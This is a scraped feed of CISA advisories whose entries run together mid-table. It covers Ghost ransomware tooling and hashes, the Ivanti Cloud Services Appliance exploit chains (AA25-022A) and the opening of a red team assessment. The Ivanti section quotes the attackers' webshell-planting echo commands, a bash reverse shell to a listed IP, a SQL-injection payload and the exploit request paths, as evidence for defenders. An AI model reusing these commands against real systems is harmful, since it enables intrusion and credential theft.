<td>Cobalt Strike</td> <td>Cobalt Strike is penetration testing software. Ghost&nbsp;actors &nbsp;use an unauthorized version of Cobalt Strike.</td> <td>N/A</td> </tr> <tr> <td>IOX</td> <td>Open-source proxy, used to establish a reverse proxy to a Ghost C2 server from an internal victim device.</td> <td>github[.]com/EddieIvan01/iox</td> </tr> <tr> <td>SharpShares.exe</td> <td>SharpShares.exe is used to enumerate accessible network shares in a domain. Ghost actors use this primarily for host discovery.</td> <td>github[.]com/mitchmoser/SharpShares</td> </tr> <tr> <td>SharpZeroLogon.exe</td> <td>SharpZeroLogon.exe attempts to exploit&nbsp;<a href="https://nvd.nist.gov/vuln/detail/CVE-2020-1472" title="CVE-2020-1472">CVE-2020-1472</a> and is run against a target Domain Controller.</td> <td>github[.]com/leitosama/SharpZeroLogon</td> </tr> <tr> <td>SharpGPPPass.exe</td> <td>SharpGPPPass.exe attempts to exploit&nbsp;<a href="https://nvd.nist.gov/vuln/detail/CVE-2014-1812" title="CVE-2014-1812">CVE-2014-1812</a> and targets XML files created through Group Policy Preferences that may contain passwords.</td> <td>N/A</td> </tr> <tr> <td>SpnDump.exe</td> <td>SpnDump.exe is used to list service principal name identifiers, which Ghost actors use for service and hostname enumeration.</td> <td>N/A</td> </tr> <tr> <td>NBT.exe</td> <td>A compiled version of SharpNBTScan, a NetBIOS scanner. Ghost actors use this tool for hostname and IP address enumeration.</td> <td>github[.]com/BronzeTicket/SharpNBTScan</td> </tr> <tr> <td>BadPotato.exe</td> <td>BadPotato.exe is an exploitation tool used for privilege escalation.</td> <td>github[.]com/BeichenDream/BadPotato</td> </tr> <tr> <td>God.exe</td> <td>God.exe is a compiled version of GodPotato and is used for privilege escalation.</td> <td>github[.]com/BeichenDream/GodPotato</td> </tr> <tr> <td>HFS (HTTP File Server)</td> <td>A portable web server program that Ghost&nbsp;actors&nbsp;use to host files for remote access and exfiltration.</td> <td>rejitto[.]com/hfs</td> </tr> <tr> <td>Ladon 911</td> <td>A multifunctional scanning and exploitation tool, often used by Ghost actors with the&nbsp;MS17010 option to scan for SMB vulnerabilities associated with&nbsp;<a href="https://nvd.nist.gov/vuln/detail/CVE-2017-0143" title="CVE-2017-0143">CVE-2017-0143</a> and&nbsp;<a href="https://nvd.nist.gov/vuln/detail/CVE-2017-0144" title="CVE-2017-0144">CVE-2017-0144</a>.</td> <td>github[.]com/k8gege/Ladon</td> </tr> <tr> <td>Web Shell</td> <td>A backdoor installed on a web server that allows for the execution of commands and facilitates persistent access.</td> <td>Slight variation of <a class="ck-anchor" id="OLE_LINK3"></a>github[.]com/BeichenDream/Chunk-Proxy/blob/main/proxy.aspx</td> </tr> </tbody> </table> </div> <div> <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap> <caption><em>Table 2: MD5 File Hashes Associated with Ghost Ransomware Activity</em></caption> <thead> <tr> <th role="columnheader" data-tablesaw-priority="persist">File name</th> <th role="columnheader">MD5 File Hash</th> </tr> </thead> <tbody> <tr> <td>Cring.exe</td> <td>c5d712f82d5d37bb284acd4468ab3533</td> </tr> <tr> <td>Ghost.exe</td> <td> <p>34b3009590ec2d361f07cac320671410</p> <p>d9c019182d88290e5489cdf3b607f982</p> </td> </tr> <tr> <td>ElysiumO.exe</td> <td> <p>29e44e8994197bdb0c2be6fc5dfc15c2</p> <p>c9e35b5c1dc8856da25965b385a26ec4</p> <p>d1c5e7b8e937625891707f8b4b594314</p> </td> </tr> <tr> <td>Locker.exe</td> <td>ef6a213f59f3fbee2894bd6734bbaed2</td> </tr> <tr> <td>iex.txt, pro.txt (IOX)</td> <td>ac58a214ce7deb3a578c10b97f93d9c3</td> </tr> <tr> <td>x86.log (IOX)</td> <td> <p>c3b8f6d102393b4542e9f951c9435255</p> <p>0a5c4ad3ec240fbfd00bdc1d36bd54eb</p> </td> </tr> <tr> <td>sp.txt (IOX)</td> <td>ff52fdf84448277b1bc121f592f753c5</td> </tr> <tr> <td>main.txt (IOX)</td> <td>a2fd181f57548c215ac6891d000ec6b9</td> </tr> <tr> <td>isx.txt (IOX)</td> <td>625bd7275e1892eac50a22f8b4a6355d</td> </tr> <tr> <td>sock.txt (IOX)</td> <td>db38ef2e3d4d8cb785df48f458b35090</td> </tr> </tbody> </table> </div> <h3>Ransom Email Addresses</h3> <p><strong>Table 3</strong> is a subset of ransom email addresses that have been included in Ghost ransom notes.</p> <div> <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap> <caption><em>Table&nbsp;3: Ransom Email Addresses</em></caption> <thead> <tr> <th colspan="3" role="columnheader" data-tablesaw-priority="persist">Email Addresses</th> </tr> </thead> <tbody> <tr> <td>asauribe@tutanota.com</td> <td>ghostbackup@skiff.com</td> <td>rainbowforever@tutanota.com</td> </tr> <tr> <td>cringghost@skiff.com</td> <td>ghosts1337 Threat Actors Chained Vulnerabilities in Ivanti Cloud Service Applications https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-022a US-CERT Alerts urn:uuid:aa57077c-fae3-e8e6-8d0e-9c5246ca6ad0 Wed, 15 Jan 2025 17:26:11 +0000 <p><strong>Note:&nbsp;</strong>The CVEs in this advisory are unrelated to vulnerabilities (CVE-2025-0282 and CVE-2025-0283) in Ivanti’s Connect Secure, Policy Secure and ZTA Gateways. For more information on mitigating CVE -2025-0282 and CVE-2025-0283, see <a href="https://www.cisa.gov/news-events/alerts/2025/01/08/ivanti-releases-security-updates-connect-secure-policy-secure-and-zta-gateways" title="Ivanti Releases Security Updates for Connect Secure, Policy Secure, and ZTA Gateways">Ivanti Releases Security Updates for Connect Secure, Policy Secure, and ZTA Gateways</a>.</p> <h2><strong>Summary</strong></h2> <p>The Cybersecurity and Infrastructure Security Agency (CISA) and Federal Bureau of Investigation (FBI) are releasing this joint Cybersecurity Advisory in response to exploitation in September 2024 of vulnerabilities in Ivanti Cloud Service Appliances (CSA): <a href="https://nvd.nist.gov/vuln/detail/CVE-2024-8963" title="CVE-2024-8963 Detail">CVE-2024-8963</a>, an administrative bypass vulnerability; <a href="https://nvd.nist.gov/vuln/detail/CVE-2024-9379" title="CVE-2024-9379 Detail">CVE-2024-9379</a>, a SQL injection vulnerability; and <a href="https://nvd.nist.gov/vuln/detail/CVE-2024-8190" title="CVE-2024-8190 Detail">CVE-2024-8190</a>&nbsp;and <a href="https://nvd.nist.gov/vuln/detail/CVE-2024-9380" title="CVE-2024-9380 Detail">CVE-2024-9380</a>, remote code execution vulnerabilities.</p> <p>According to CISA and trusted third-party incident response data, threat actors chained the listed vulnerabilities to gain initial access, conduct remote code execution (RCE), obtain credentials, and implant webshells on victim networks. The actors’ primary exploit paths were two vulnerability chains. One exploit chain leveraged CVE-2024-8963 in conjunction with CVE-2024-8190 and CVE-2024-9380 and the other exploited CVE-2024-8963 and CVE-2024-9379. In one confirmed compromise, the actors moved laterally to two servers.</p> <p>All four vulnerabilities affect Ivanti CSA version 4.6x versions before 519, and two of the vulnerabilities (CVE-2024-9379 and CVE-2024-9380) affect CSA versions 5.0.1 and below; according to Ivanti, these CVEs have not been exploited in version 5.0.[<a href="https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-CSA-Cloud-Services-Appliance-CVE-2024-9379-CVE-2024-9380-CVE-2024-9381?language=en_US" title="Security Advisory Ivanti CSA (Cloud Services Application) (CVE-2024-9379, CVE-2024-9380, CVE-2024-9381)">1</a>]</p> <p>Ivanti CSA 4.6 is End-of-Life (EOL) and no longer receives patches or third-party libraries. CISA and FBI strongly encourage network administrators to upgrade to the latest supported version of Ivanti CSA.&nbsp;Network defenders are encouraged to hunt for malicious activity on their networks using the detection methods and indicators of compromise (IOCs) within this advisory. Credentials and sensitive data stored within the affected Ivanti appliances should be considered compromised. Organizations should collect and analyze logs and artifacts for malicious activity and apply the incident response recommendations within this advisory.</p> <p>Download the PDF version of this report:</p> <div class="c-file"> <div class="c-file__download"> <a href="https://www.cisa.gov/sites/default/files/2025-01/aa25-022a-threat-actors-chained-vulnerabilities-in-ivanti-cloud-service-applications.pdf" class="c-file__link" target="_blank">AA25-022A Threat Actors Chained Vulnerabilities in Ivanti Cloud Service Applications</a> <span class="c-file__size">(PDF, 756.92 KB )</span> </div> </div> <p>For a downloadable copy of IOCs, see:</p> <div class="c-file"> <div class="c-file__download"> <a href="https://www.cisa.gov/sites/default/files/2025-01/AA25-022A.stix_.xml" class="c-file__link" target="_blank">AA25-022A STIX XML</a> <span class="c-file__size">(XML, 105.56 KB )</span> </div> </div> <div class="c-file"> <div class="c-file__download"> <a href="https://www.cisa.gov/sites/default/files/2025-01/AA5-022A-Threat-Actors-Chain-Vulnerabilities-In-Ivanti-Cloud-Service-Applications.stix_.json" class="c-file__link" target="_blank">AA25-022A STIX JSON</a> <span class="c-file__size">(JSON, 76.91 KB )</span> </div> </div> <h2><strong>Technical Details</strong></h2> <p><strong>Note:</strong> This advisory uses the&nbsp;<a href="https://attack.mitre.org/versions/v16/matrices/enterprise/" title="Enterprise Matrix">MITRE ATT&amp;CK<sup>®</sup> Matrix for Enterprise</a> framework, version 16. See the <strong>MITRE ATT&amp;CK Tactics and Techniques</strong> section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&amp;CK tactics and techniques.</p> <p>In September 2024, Ivanti released two Security Advisories disclosing exploitation of CVE-2024-8190 and&nbsp;CVE-2024-8963.[<a href="https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Cloud-Service-Appliance-CSA-CVE-2024-8190?language=en_US" title="Security Advisory Ivanti Cloud Service Appliance (CSA) (CVE-2024-8190)">2</a>][<a href="https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-CSA-4-6-Cloud-Services-Appliance-CVE-2024-8963?language=en_US" title="Security Advisory Ivanti CSA 4.6 (Cloud Services Appliance) (CVE-2024-8963)">3</a>] In October 2024, Ivanti released another advisory disclosing exploitation of CVE-2024-9379 and CVE-2024-9380.[<a href="https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-CSA-Cloud-Services-Appliance-CVE-2024-9379-CVE-2024-9380-CVE-2024-9381?language=en_US" title="Security Advisory Ivanti CSA (Cloud Services Application) (CVE-2024-9379, CVE-2024-9380, CVE-2024-9381)">1</a>]</p> <ul> <li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-8963" title="CVE-2024-8963 Detail">CVE-2024-8963</a> [<a href="https://cwe.mitre.org/data/definitions/22.html" title="CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')">CWE-22: Path Traversal</a>] is an administrate bypass vulnerability that allows threat actors to remotely access restricted features within the appliance. When used in conjunction with CVE-2024-8190 [<a href="https://cwe.mitre.org/data/definitions/78.html" title="CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')">CWE-78: OS Command Injection</a>], threat actors can remotely authenticate into a victims’ network and execute arbitrary commands on the appliance [<a href="https://attack.mitre.org/versions/v16/techniques/T1219/" title="Remote Access Software">T1219</a>].[<a href="https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Cloud-Service-Appliance-CSA-CVE-2024-8190?language=en_US" title="Security Advisory Ivanti Cloud Service Appliance (CSA) (CVE-2024-8190)">2</a>][<a href="https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-CSA-4-6-Cloud-Services-Appliance-CVE-2024-8963?language=en_US" title="Security Advisory Ivanti CSA 4.6 (Cloud Services Appliance) (CVE-2024-8963)">3</a>]</li> <li>CVE-2024-9379 [<a href="https://cwe.mitre.org/data/definitions/89.html" title="CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')">CWE-89: SQL Injection</a>] allows a remote authenticated attacker with admin privileges to run arbitrary SQL statements.[<a href="https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-CSA-Cloud-Services-Appliance-CVE-2024-9379-CVE-2024-9380-CVE-2024-9381?language=en_US" title="Security Advisory Ivanti CSA (Cloud Services Application) (CVE-2024-9379, CVE-2024-9380, CVE-2024-9381)">1</a>]</li> <li>CVE-2024-9380 [<a href="https://cwe.mitre.org/data/definitions/77.html" title="CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')">CWE-77: Command Injection</a>] allows a remote authenticated attacker with admin privileges to obtain RCE.[<a href="https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-CSA-Cloud-Services-Appliance-CVE-2024-9379-CVE-2024-9380-CVE-2024-9381?language=en_US" title="Security Advisory Ivanti CSA (Cloud Services Application) (CVE-2024-9379, CVE-2024-9380, CVE-2024-9381)">1</a>]</li> </ul> <p>According to Ivanti’s advisories and industry reporting, these vulnerabilities were exploited as zero days.[<a href="https://www.fortinet.com/blog/threat-research/burning-zero-days-suspected-nation-state-adversary-targets-ivanti-csa" title="Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA">4</a>] Based on evidence of active exploitation, CISA added CVE-2024-8963, CVE-2024-8190, CVE-2024-9379, and CVE-2024-9380 to its&nbsp;<a href="https://www.cisa.gov/known-exploited-vulnerabilities-catalog" title="Known Exploited Vulnerabilities Catalog">Known Exploited Vulnerabilities (KEV) Catalog</a>.</p> <p>According to CISA and trusted third-party incident response data, threat actors chained the above listed vulnerabilities to gain initial access, conduct RCE, obtain credentials, and implant webshells on victim networks. The primary exploit paths included two vulnerability chains. One exploit chain leveraged CVE-2024-8963 in conjunction with CVE-2024-8190 and CVE-2024-9380. The other chain exploited CVE-2024-8963 and CVE-2024-9379. After exploitation, the actors moved laterally in one victim—other victims had no follow-on activity because they identified anomalous activity and implemented mitigation measures.</p> <h3>Exploit Chain 1</h3> <p>The threat actors leveraged CVE-2024-8963 in conjunction with remote code execution vulnerabilities, CVE-2024-8190 and CVE-2024-9380. Acting as a&nbsp;<code>nobody</code> user [<a href="https://attack.mitre.org/versions/v16/techniques/T1564/002/" title="Hide Artifacts: Hidden Users">T1564.002</a>], the threat actors first sent a&nbsp;<code>GET</code> request to&nbsp;<code>datetime.php</code> to acquire session and cross-site request forgery (CSRF) tokens using&nbsp;<code>GET /client/index.php%3F.php/gsb/datetime[.]php</code> [<a href="https://attack.mitre.org/versions/v16/techniques/T1071/001/" title="Application Layer Protocol: Web Protocols">T1071.001</a>]. They followed this in quick succession with a&nbsp;<code>POST</code> request to the same endpoint, using the&nbsp;<code>TIMEZONE</code> input field to manipulate the&nbsp;<code>setSystemTimeZone</code> function and execute code. In some confirmed compromises, the actors used this method to run base64-encoded Python scripts that harvested encrypted admin credentials from the database [<a href="https://attack.mitre.org/versions/v16/techniques/T1552/001/" title="Unsecured Credentials: Credentials In Files">T1552.001</a>]. <strong>Note:</strong> The actors used multiple script variations. See <strong>Appendix A</strong> for examples of encoded and decoded scripts.</p> <p>In some cases, the threat actors exfiltrated the encrypted admin credentials then decrypted them offline [<a href="https://attack.mitre.org/versions/v16/tactics/TA0010/" title="Exfiltration">TA0010</a>]. In other cases, the threat actors leveraged an executable matching the regular expression&nbsp;<code>php\w{6}</code> located in the /tmp directory to decrypt the credentials prior to exfiltration—this tool was unrecoverable.</p> <p>After obtaining credentials, the actors logged in and exploited CVE-2024-9380 to execute commands from a higher privileged account. The actors successfully sent a&nbsp;<code>GET</code> request to&nbsp;<code>/gsb/reports[.]php</code>. They immediately followed this with a&nbsp;<code>POST</code> request using the&nbsp;<code>TW_ID</code> input field to execute code to implant webshells for persistence [<a href="https://attack.mitre.org/versions/v16/techniques/T1505/003/" title="Server Software Component: Web Shell">T1505.003</a>].</p> <p>In one confirmed compromise, the threat actors tried to create webshells using two different paths:</p> <ul> <li><code>echo "&lt;?php system(@</code><br><code>\$_REQUEST['a']);"&gt;/opt/ivanti/csa/broker/webroot/client/help.php</code></li> <li><code>echo "&lt;?php system('/bin/sudo '. @</code><br><code>\$_REQUEST['a']);" &gt; /opt/landesk/broker/webroot/gsb/help.php</code></li> </ul> <p>In the same compromise, the actors used the exploit to execute the following script to create a reverse Transmission Control Protocol command and control (C2) channel:&nbsp;<code>bash -i &gt;&amp;/dev/tcp/107.173.89[.]16/8000 0&gt;&amp;1</code>.</p> <p>In another compromise, the threat actors maintained their presence on the victim’s system for a longer amount of time. The threat actors used&nbsp;<code>sudo</code> commands to disable the vulnerability in&nbsp;<code>DateTimeTab.php</code>, modify and remove webshells, and remove evidence of exploitation [<a href="https://attack.mitre.org/versions/v16/techniques/T1548/003/" title="Abuse Elevation Control Mechanism: Sudo and Sudo Caching">T1548.003</a>]. See <strong>Appendix B</strong> for the list of&nbsp;<code>sudo</code> commands used.</p> <h4><strong>Lateral Movement</strong></h4> <p>In one case, there was evidence of lateral movement after the threat actors gained access and established a foothold through this exploit chain. It is suspected that the threat actors gained access into a Jenkins server running a vulnerable, outdated version [<a href="https://attack.mitre.org/versions/v16/techniques/T1068/" title="Exploitation for Privilege Escalation">T1068</a>]. Logs on the Jenkins machine showed that a command in the bash history contained credentials to the postgres server. The threat actors then attempted to log into the Virtual Private Network (VPN) server but were unsuccessful. Prior to moving laterally, the actors likely performed discovery on the CSA device using Obelisk and GoGo to scan for vulnerabilities [<a href="https://attack.mitre.org/versions/v16/techniques/T1595/002/" title="Active Scanning: Vulnerability Scanning">T1595.002</a>].</p> <h3>Exploit Chain 2</h3> <p>In one confirmed compromise, the actors used a similar exploit chain, exploiting CVE-2024-8963 in conjunction with CVE-2024-9379, using&nbsp;<code>GET /client/index.php%3f.php/gsb/broker.php</code> for initial access.</p> <p>After the threat actors gained initial access, they attempted to exploit CVE-2024-9379 to create a webshell to gain persistent access. They executed&nbsp;<code>GET</code> and&nbsp;<code>POST</code> requests in quick succession to&nbsp;<code>/client/index.php%3F.php/gsb/broker.php</code>. In the&nbsp;<code>POST</code> body, threat actors entered the following string in the lockout attempts input box:&nbsp;<code>LOCKOUTATTEMPTS = 1 ;INSERT INTO user_info(username, accessed, attempts) VALUES ('''echo -n TnNhV1Z1ZEM5b1pXeHdMbk&gt;&gt;/.k''', NOW(), 10)</code>. The first portion of the command&nbsp;(LOCKOUTATTEMPTS=1) fit the format of the application and was properly handled by the application. However, the second portion of the command, a SQL injection [<a href="https://attack.mitre.org/versions/v16/techniques/T1190/" title="Exploit Public-Facing Application">T1190</a>], was not properly handled by the application. Regardless, the application processed both commands, allowing the threat actors to insert a user into the&nbsp;<code>user_info</code> table.</p> <p>After inserting valid bash code as a user in the&nbsp;<code>user_info</code> table, the threat actors attempted to login as the user. The authoring agencies believe the threat actors knew this login would fail but were attempting to coerce the application into handling the bash code improperly. In this attempt, the application did not evaluate the validity of the login, but instead ran&nbsp;<code>echo -n TnNhV1Z1ZEM5b1pXeHdMbk&gt;&gt;./k</code> as if it were code. The threat actors repeated the process of echo commands until they built a valid web shell [<a href="https://attack.mitre.org/versions/v16/techniques/T1059/" title="Command and Scripting Interpreter">T1059</a>]. However, there were no observations that the threat actors were successful.</p> <h3>Detection of Activity</h3> <p>According to incident response data from three victim organizations, the actors were unsuccessful with follow-on activity due to the organizations’ rapid detection of the malicious activity. To remediate exploitation, all three organizations replaced the virtual machines with clean and upgraded versions.</p> <h4><strong>Victim Organization 1</strong></h4> <p>The first organization detected malicious activity early in the exploitation. A system administrator detected the anomalous creation of user accounts. After investigation, the organization remediated the incident. While it is likely admin credentials were exfiltrated, there were no signs of lateral movement.</p> <h4><strong>Victim Organization 2</strong></h4> <p>This organization had an endpoint protection platform (EPP) installed on their system that alerted when the threat actors executed base64 encoded script to create webshells. There were no indications of webshells successfully being created or of lateral movement.</p> <h4><strong>Victim Organization 3</strong></h4> <p>This organization leveraged the IOC findings from the other two victim sites to quickly detect malicious activity. This threat activity included the download and deployment of Obelisk and GoGo Scanner, which generated a large number of logs. The organization used these logs to identify anomalous activity.</p> <h2><strong>Indicators of Compromise</strong></h2> <p>See <strong>Table 1</strong> through <strong>Table 3</strong> for IOCs related to the threat actors’ exploitation of CVE-2024-8963, CVE-2024-8190, CVE-2024-9379, and CVE-2024-9380 in Ivanti CSA.</p> <p><strong>Disclaimer:</strong> Some IP addresses in this cybersecurity advisory may be associated with legitimate activity. Organizations are encouraged to investigate the activity around these IP addresses prior to taking action, such as blocking. Activity should not be attributed as malicious without analytical evidence to support they are used at the direction of, or controlled by, threat actors.</p> <div> <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap> <caption><em>Table&nbsp;1: IP Address Used for Credential Theft, September 2024</em></caption> <thead> <tr> <th role="columnheader" data-tablesaw-priority="persist">File Name</th> <th role="columnheader">IP Address</th> <th role="columnheader">Description</th> </tr> </thead> <tbody> <tr> <td>"/client/index.php%3f.php/gsb/datetime.php</td> <td>142.171.217[.]195</td> <td>/var/log/messages</td> </tr> <tr> <td>"/client/index.php%3f.php/gsb/datetime.php</td> <td>154.64.226[.]166</td> <td>/var/log/messages-20240904.gz</td> </tr> <tr> <td>"/client/index.php%3f.php/gsb/datetime.php</td> <td>216.131.75[.]53</td> <td>&nbsp;</td> </tr> <tr> <td>"/client/index.php%3f.php/gsb/datetime.php</td> <td>23.236.66[.]97</td> <td>/var/log/messages-20240905.gz</td> </tr> <tr> <td>"/client/index.php%3f.php/gsb/datetime.php</td> <td>38.207.159[.]76</td> <td>/var/log/messages-20240906.gz</td> </tr> </tbody> </table> </div> <div> <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap> <caption><em>Table 2: Survey 2, Ivanti CSA Network IOC List, September 2024</em></caption> <thead> <tr> <th role="columnheader" data-tablesaw-priority="persist">File Name</th> <th role="columnheader">IP Address</th> <th role="columnheader">Description</th> </tr> </thead> <tbody> <tr> <td>&nbsp;</td> <td>149.154.167[.]41</td> <td>&nbsp;</td> </tr> <tr> <td>&nbsp;</td> <td>95.161.76[.]100</td> <td>&nbsp;</td> </tr> <tr> <td>hxxps://file.io/E50vtqmJP5aa</td> <td>&nbsp;</td> <td>&nbsp;</td> </tr> <tr> <td>hxxps://file.io/RBKuU8gicWt</td> <td>&nbsp;</td> <td>&nbsp;</td> </tr> <tr> <td>hxxps://file.io/frdZ9L18R7Nx</td> <td>&nbsp;</td> <td>&nbsp;</td> </tr> <tr> <td>hxxp://ip.sb</td> <td>&nbsp;</td> <td>&nbsp;</td> </tr> <tr> <td> <p>hxxps://pan.xj.hk/d/</p> <p>6401646e701f5f47518ecef48a308a36/redis</p> </td> <td>&nbsp;</td> <td>&nbsp;</td> </tr> <tr> <td>&nbsp;</td> <td>142.171.217[.]195</td> <td>&nbsp;</td> </tr> <tr> <td>&nbsp;</td> <td>108.174.199[.]200</td> <td>&nbsp;</td> </tr> <tr> <td>&nbsp;</td> <td>206.189.156[.]69</td> <td>&nbsp;</td> </tr> <tr> <td>&nbsp;</td> <td>108.174.199[.]200/Xa27efd2.tmp</td> <td>&nbsp;</td> </tr> <tr> <td>&nbsp;</td> <td>142.171.217[.]195</td> <td>&nbsp;</td> </tr> </tbody> </table> </div> <div> <table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap> <caption><em>Table&nbsp;3: Additional IOCs Derived from Incident Response, September 2024</em></caption> <thead> <tr> <th role="columnheader" data-tablesaw-priority="persist">Type</th> <th role="columnheader">IOC</th> <th role="columnheader">Description</th> </tr> </thead> <tbody> <tr> <td>Ipv4</td> <td>107.173.89[.]16</td> <td>&nbsp;</td> </tr> <tr> <td>Ipv4</td> <td>38.207.159[.]76</td> <td>&nbsp;</td> </tr> <tr> <td>Ipv4</td> <td>142.171.217[.]195</td> <td>&nbsp;</td> </tr> <tr> <td>Ipv4</td> <td>154.64.226[.]166</td> <td>&nbsp;</td> </tr> <tr> <td>Ipv4</td> <td>156.234.193[.]18</td> <td>&nbsp;</td> </tr> <tr> <td>Ipv4</td> <td>216.131.75[.]53</td> <td>&nbsp;</td> </tr> <tr> <td>Ipv4</td> <td>205.169.39[.]11</td> <td>&nbsp;</td> </tr> <tr> <td>Ipv4</td> <td>23.236.66[.]97</td> <td>&nbsp;</td> </tr> <tr> <td>Ipv4</td> <td>149.154.176[.]41</td> <td>&nbsp;</td> </tr> <tr> <td>Ipv4</td> <td>95.161.76[.]100</td> <td>&nbsp;</td> </tr> <tr> <td>Ipv4</td> <td>142.171.217[.]195</td> <td>&nbsp;</td> </tr> <tr> <td>Ipv4</td> <td>108.174.199[.]200</td> <td>&nbsp;</td> </tr> <tr> <td>Ipv4</td> <td>206.189.156[.]69</td> <td>&nbsp;</td> </tr> <tr> <td>Ipv4</td> <td>142.171.217[.]195</td> <td>&nbsp;</td> </tr> <tr> <td>Ipv4</td> <td>67.217.228[.]83</td> <td>&nbsp;</td> </tr> <tr> <td>Ipv4</td> <td>203.160.72[.]174</td> <td>&nbsp;</td> </tr> <tr> <td>Ipv4 Enhancing Cyber Resilience: Insights from CISA Red Team Assessment of a US Critical Infrastructure Sector Organization https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-326a US-CERT Alerts urn:uuid:be3e9819-7b3b-0f9c-d5e0-5c28578069a7 Fri, 02 Aug 2024 17:17:08 +0000 <h2><strong>EXECUTIVE SUMMARY</strong></h2> <p>The Cybersecurity and Infrastructure Security Agency (CISA) conducted a red team assessment (RTA) at the request of a critical infrastructure organization. During RTAs, CISA’s red team simulates real-world malicious cyber operations to assess an organization’s cybersecurity detection and response capabilities. In coordination with the assessed organization, CISA is releasing this Cybersecurity Advisory to detail the red team’s activity—including their tactics, techniques, and procedures (TTPs) and associated network defense activity. Additionally, the advisory contains lessons learned and key findings from the assessment to provide recommendations to network defenders and software manufacturers for improving their organizations’ and customers’ cybersecurity posture.</p> <p>Within this assessment, the red team (also referred to as ‘the team’) gained initial access through a web shell left from a third party’s previous security assessment. The red team proceeded to move through the demilitarized zone (DMZ) and into the network to fully compromise the organization’s domain and several sensitive business system (SBS) targets. The assessed organization discovered evidence of the red team’s initial activity but failed to act promptly regarding the malicious network traffic through its DMZ or challenge much of the red team’s presence in the organization’s Windows environment.</p> <p>The red team was able to compromise the domain and SBSs of the organization as it lacked sufficient controls to detect and respond to their activities. The red team’s findings illuminate lessons learned for network defenders and software manufacturers about how to respond to and reduce risk.</p> <ul> <li><strong>Lesson Learned: The assessed organization had insufficient technical controls to prevent and detect malicious activity.</strong> The organization relied too heavily on host-based endpoint detection and response (EDR) solutions and did not implement sufficient network layer protections.</li> <li><strong>Lesson Learned: The organization’s staff require continuous training, support, and resources to implement secure software configurations and detect malicious activity.</strong> Staff need to continuously enhance their technical competency, gain additional institutional knowledge of their systems, and ensure they are provided sufficient resources by management to have the conditions to succeed in protecting their networks.</li> <li><strong>Lesson Learned: The organization’s leadership minimized the business risk of known attack vectors for the organization.</strong> Leadership deprioritized the treatment of a vulnerability their own cybersecurity team identified, and in their risk-based decision-making, miscalculated the potential impact and likelihood of its exploitation.</li> </ul> <p>To reduce risk of similar malicious cyber activity, CISA encourages critical infrastructure organizations to apply the recommendations in the <strong>Mitigations</strong> section of this advisory to ensure security processes and procedures are up to date, effective, and enable timely detection and mitigation of malicious activity.</p> <p>This document illustrates the outsized burden and costs of compensating for insecure software and hardware borne by critical infrastructure owners and operators. The expectation that owners and operators should maintain the requisite sophisticated cyber defense skills creates undue risk. Technology manufacturers must assume responsibility for product security. Recognizing that insecure software contributes to these identified issues, CISA urges software manufacturers to embrace <a href="https://www.cisa.gov/securebydesign">Secure by Design</a> principles and implement the recommendations in the Mitigations section of this advisory, including those listed below:</p> <ul> <li><strong>Embed security into product architecture throughout the entire software development lifecycle&nbsp;</strong>(SDLC).</li> <li><strong>Eliminate default passwords</strong>.</li> <li><strong>Mandate MFA</strong>, ideally phishing-resistant MFA, for privileged users and make MFA a default, rather than opt-in, feature.</li> </ul> <p>Download the PDF version of this report:</p> <div class="c-file"> <div class="c-file__download"> <a href="/sites/default/files/2024-11/aa24-326a-enhancing-cyber-resilience-insights-from-cisa-red-team-assessment_0.pdf" class="c-file__link" target="_blank">AA24-326A Enhancing Cyber Resilience: Insights from CISA Red Team Assessment of a U.S. Critical Infrastructure Sector Organization</a> <span class="c-file__size">(PDF, 823.56 KB )</span> </div> </div> <h2><strong>INTRODUCTION</strong></h2> <p>CISA has authority to—upon request—provide analyses, expertise, and other technical assistance to critical infrastructure owners and operators and provide operational and timely technical assistance to federal and non-federal entities with respect to cybersecurity risks. (See generally 6 U.S.C. §§ 652[c][5], 659[c][6]). The target organization for this assessment was a critical infrastructure organization in the United States. After receiving a request for an RTA from the organization and coordinating the high-level details of the engagement, CISA conducted the RTA over approximately a three-month period.</p> <p>During RTAs, a CISA red team simulates real-world threat actors to assess an organization’s cybersecurity detection and response capabilities. During Phase I, the red team attempts to gain and maintain persistent access to an organization’s enterprise network, avoid detection, evade defenses, and access SBSs. During Phase II, the red team attempts to trigger a security response from the organization’s people, processes, and/or technology.</p> <p>Drafted in coordination with the assessed organization, this advisory details the red team’s activity and TTPs, associated network defense activity, and lessons learned to provide network defenders with recommendations for improving an organization’s cybersecurity posture. The advisory also provides recommendations for software manufacturers to harden their customer networks against malicious activity and reduce the likelihood of domain compromise.</p> <h2><strong>TECHNICAL DETAILS</strong></h2> <p><strong>Note:</strong>&nbsp;This advisory uses the <a href="https://attack.mitre.org/versions/v16/matrices/enterprise/">MITRE ATT&amp;CK<sup>®</sup></a><a href="https://attack.mitre.org/versions/v16/matrices/enterprise/" title="Enterprise Matrix"> Matrix for Enterprise</a> framework, version 16. See Appendix: MITRE ATT&amp;CK Tactics and Techniques for a table of the red team’s activity mapped to MITRE ATT&amp;CK tactics and techniques.</p> <h3>Phase I: Red Team Cyber Threat Activity</h3> <h4><strong>Overview</strong></h4> <p>The CISA red team operated without prior knowledge of the organization’s technology assets and began the assessment by conducting open source research on the target organization to gain information about its network [<a href="https://attack.mitre.org/versions/v16/techniques/T1590/">T1590</a>], defensive tools [<a 